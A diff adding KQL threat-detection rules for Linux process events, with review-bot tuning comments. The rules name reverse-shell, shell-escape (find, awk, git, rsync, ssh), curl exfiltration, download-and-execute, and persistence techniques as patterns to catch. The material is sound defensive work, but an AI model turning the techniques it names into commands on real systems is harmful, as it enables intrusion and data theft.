+| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "import" and ProcessCommandLine contains "pty" and ProcessCommandLine contains "socket" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains ".connect") and FolderPath contains "python"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql
new file mode 100644
index 00000000..5e2e796d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql
@@ -0,0 +1,10 @@
+// Title: Python Spawning Pretty TTY Via PTY Module
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "import pty" or ProcessCommandLine contains "from pty ") and ProcessCommandLine contains "spawn" and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql b/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql
new file mode 100644
index 00000000..175e8487
--- /dev/null
+++ b/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql
@@ -0,0 +1,14 @@
+// Title: Python WebServer Execution - Linux
+// Author: Mohamed LAKRI
+// Date: 2025-10-17
+// Level: medium
+// Description: Detects the execution of Python web servers via command line interface (CLI).
+// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.
+// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+// False Positives:
+// - Testing or development activity
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) and (ProcessCommandLine contains "http.server" or ProcessCommandLine contains "SimpleHTTPServer")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql
new file mode 100644
index 00000000..23ff74bf
--- /dev/null
+++ b/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Team Viewer Session Started On Linux Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+// - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql b/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql
new file mode 100644
index 00000000..a7be8874
--- /dev/null
+++ b/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql
@@ -0,0 +1,12 @@
+// Title: Remove Immutable File Attribute
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'chattr' utility to remove immutable file attribute.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+// - Administrator interacting with immutable files (e.g. for instance backups).
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -i " and FolderPath endswith "/chattr"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql b/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql
new file mode 100644
index 00000000..a6ff966a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql
@@ -0,0 +1,11 @@
+// Title: Remove Scheduled Cron Task/Job
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'crontab' utility to remove the current crontab.
+// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql b/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql
new file mode 100644
index 00000000..bf4850ee
--- /dev/null
+++ b/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Cron Task/Job - Linux
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/scheduled_task_job_at.kql b/KQL/rules/linux/process_creation/scheduled_task_job_at.kql
new file mode 100644
index 00000000..ee1cc60f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/scheduled_task_job_at.kql
@@ -0,0 +1,13 @@
+// Title: Scheduled Task/Job At
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the use of at/atd which are utilities that are used to schedule tasks.
+// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/at" or FolderPath endswith "/atd"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/security_software_discovery_linux.kql b/KQL/rules/linux/process_creation/security_software_discovery_linux.kql
new file mode 100644
index 00000000..902ae8e1
--- /dev/null
+++ b/KQL/rules/linux/process_creation/security_software_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: Security Software Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "cbagentd" or ProcessCommandLine contains "falcond") and (FolderPath endswith "/grep" or FolderPath endswith "/egrep")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/setuid_and_setgid.kql b/KQL/rules/linux/process_creation/setuid_and_setgid.kql
new file mode 100644
index 00000000..5cb14d38
--- /dev/null
+++ b/KQL/rules/linux/process_creation/setuid_and_setgid.kql
@@ -0,0 +1,12 @@
+// Title: Setuid and Setgid
+// Author: Ömer Günal
+// Date: 2020-06-16
+// Level: low
+// Description: Detects suspicious change of file privileges with chown and chmod commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " chmod u+s" or ProcessCommandLine contains " chmod g+s") and ProcessCommandLine contains "chown root"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql b/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql
new file mode 100644
index 00000000..0c36903b
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution GCC - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash,-s" or ProcessCommandLine contains "/bin/dash,-s" or ProcessCommandLine contains "/bin/fish,-s" or ProcessCommandLine contains "/bin/sh,-s" or ProcessCommandLine contains "/bin/zsh,-s") and (ProcessCommandLine contains "-wrapper" and (FolderPath endswith "/c89" or FolderPath endswith "/c99" or FolderPath endswith "/gcc"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql
new file mode 100644
index 00000000..da13dec7
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution Of Process Located In Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and InitiatingProcessFolderPath startswith "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql
new file mode 100644
index 00000000..97c5fc00
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Find - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " . " and ProcessCommandLine contains "-exec") and FolderPath endswith "/find")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql
new file mode 100644
index 00000000..5673720e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Flock - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -u " and FolderPath endswith "/flock")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql
new file mode 100644
index 00000000..2eadafa8
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Git - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "bash 0<&1" or ProcessCommandLine contains "dash 0<&1" or ProcessCommandLine contains "sh 0<&1") and (InitiatingProcessCommandLine contains " -p " and InitiatingProcessCommandLine contains "help") and InitiatingProcessFolderPath endswith "/git"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql
new file mode 100644
index 00000000..eefb729d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Nice - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/nice"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql
new file mode 100644
index 00000000..fa87938e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql
@@ -0,0 +1,12 @@
+// Title: Shell Execution via Rsync - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate cases in which "rsync" is used to execute a shell
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/ash " or ProcessCommandLine contains "/bash " or ProcessCommandLine contains "/dash " or ProcessCommandLine contains "/csh " or ProcessCommandLine contains "/sh " or ProcessCommandLine contains "/zsh " or ProcessCommandLine contains "/tcsh " or ProcessCommandLine contains "/ksh " or ProcessCommandLine contains "'ash " or ProcessCommandLine contains "'bash " or ProcessCommandLine contains "'dash " or ProcessCommandLine contains "'csh " or ProcessCommandLine contains "'sh " or ProcessCommandLine contains "'zsh " or ProcessCommandLine contains "'tcsh " or ProcessCommandLine contains "'ksh ") and (ProcessCommandLine contains " -e " and (FolderPath endswith "/rsync" or FolderPath endswith "/rsyncd"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql
new file mode 100644
index 00000000..6f2fbba6
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Invocation via Apt - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "APT::Update::Pre-Invoke::=" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql
new file mode 100644
index 00000000..6c1e49de
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql
@@ -0,0 +1,12 @@
+// Title: Shell Invocation via Env Command - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Github operations such as ghe-backup
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/env"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql
new file mode 100644
index 00000000..a89ce264
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Invocation Via Ssh - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-08-29
+// Level: high
+// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "sh 0<&2 1>&2" or ProcessCommandLine contains "sh 1>&2 0<&2") and ((ProcessCommandLine contains "ProxyCommand=;" or ProcessCommandLine contains "permitlocalcommand=yes" or ProcessCommandLine contains "localhost") and FolderPath endswith "/ssh")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql
new file mode 100644
index 00000000..9cb0a989
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Curl Change User Agents - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects a suspicious curl process start on linux with set useragent options
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql
new file mode 100644
index 00000000..b704ae58
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Curl File Upload - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects a suspicious curl process start the adds a file to a web request
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105
+// False Positives:
+// - Scripts created by developers and admins
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and FolderPath endswith "/curl") and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql
new file mode 100644
index 00000000..67d2a5c2
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql
@@ -0,0 +1,16 @@
+// Title: Suspicious Download and Execute Pattern via Curl/Wget
+// Author: Aayush Gupta
+// Date: 2025-06-17
+// Level: high
+// Description: Detects suspicious use of command-line tools such as curl or wget to download remote
+// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
+// immediate execution, indicating potential malicious activity. This pattern is commonly used
+// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.t1203
+// False Positives:
+// - System update scripts using temporary files
+// - Installer scripts or automated provisioning tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/curl" or ProcessCommandLine contains "/wget") and ProcessCommandLine contains "sh -c" and (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/dev/shm/")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql b/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql
new file mode 100644
index 00000000..a8ab897a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Git Clone - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1593.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " clone " and FolderPath endswith "/git") and (ProcessCommandLine contains "exploit" or ProcessCommandLine contains "Vulns" or ProcessCommandLine contains "vulnerability" or ProcessCommandLine contains "RCE" or ProcessCommandLine contains "RemoteCodeExecution" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "CVE-" or ProcessCommandLine contains "poc-" or ProcessCommandLine contains "ProofOfConcept" or ProcessCommandLine contains "proxyshell" or ProcessCommandLine contains "log4shell" or ProcessCommandLine contains "eternalblue" or ProcessCommandLine contains "eternal-blue" or ProcessCommandLine contains "MS17-")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql
new file mode 100644
index 00000000..b531df6b
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_awk_linux.kql
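Review bot: The keyword group in the second half of the `where` clause relies on `contains`, which in KQL is a case-insensitive substring test, so the short tokens `"RCE"` and `"Vulns"` also fire on ordinary repository names containing `source`, `force` or `resources` (any `git clone .../opensource-tools` matches `RCE`). For those two tokens a bounded, case-sensitive match would keep the rule's precision, e.g. `ProcessCommandLine matches regex "\\bRCE\\b"` and `ProcessCommandLine contains_cs "Vulns"`; the longer keywords such as `log4shell` or `ProofOfConcept` are specific enough to stay as they are. The same pattern appears in the upstream Sigma rule, so this is a tuning point for the generated KQL rather than a conversion error.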
@@ -0,0 +1,11 @@
+// Title: Suspicious Invocation of Shell via AWK - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function.
+// This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains "BEGIN {system" and (FolderPath endswith "/awk" or FolderPath endswith "/gawk" or FolderPath endswith "/mawk" or FolderPath endswith "/nawk"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql
new file mode 100644
index 00000000..790c440a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_invocation_of_shell_via_rsync.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Invocation of Shell via Rsync
+// Author: Florian Roth
+// Date: 2025-01-18
+// Level: high
+// Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/ash" or FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/tcsh" or FolderPath endswith "/zsh") and (InitiatingProcessFolderPath endswith "/rsync" or InitiatingProcessFolderPath endswith "/rsyncd")) and (not(ProcessCommandLine contains " -e "))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql b/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql
new file mode 100644
index 00000000..9297fe2c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_java_children_processes.kql
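Review bot: The `-e` exclusion at the end of the `where` clause is evaluated against `ProcessCommandLine`, which in this query is the spawned shell's own command line, while the `-e` flag the description refers to is passed to rsync, the parent process; as written, a shell child of rsync is suppressed only when its own arguments happen to contain ` -e `, and a legitimate `rsync -e ssh` child is still reported. If the intent is the rsync invocation's flag, the filter should read `and (not(InitiatingProcessCommandLine contains " -e "))`. This may trace back to the field the upstream Sigma rule uses, so the converter's field mapping for that filter is worth checking before changing only the generated file.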
@@ -0,0 +1,10 @@
+// Title: Suspicious Java Children Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-03
+// Level: high
+// Description: Detects java process spawning suspicious children
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql b/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql
new file mode 100644
index 00000000..8d84b7b3
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_nohup_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Nohup Execution
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of binaries located in potentially suspicious locations via "nohup"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "/nohup"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
new file mode 100644
index 00000000..48a6fa57
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_package_installed_linux.kql
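Review bot: The child-process test matches shell names as substrings of `ProcessCommandLine` instead of against `FolderPath`, so `"dash"`, `"ksh"` and `"csh"` also hit unrelated arguments (a Java service launching a helper with `dashboard` in its path, for example), and because `contains` is case-insensitive the overlap is wider still; for a high-severity rule that is a lot of noise. Anchoring the shell part on the image, e.g. `FolderPath endswith "/bash" or FolderPath endswith "/dash" or FolderPath endswith "/ksh"` and so on, while keeping the command-line test only for `curl`/`wget`/`python`, would preserve the intent with far fewer false positives. The upstream Sigma rule may match on CommandLine by design, so treat this as tuning of the generated KQL rather than a conversion error.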
@@ -0,0 +1,12 @@
+// Title: Suspicious Package Installed - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects installation of suspicious packages using system installation utilities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
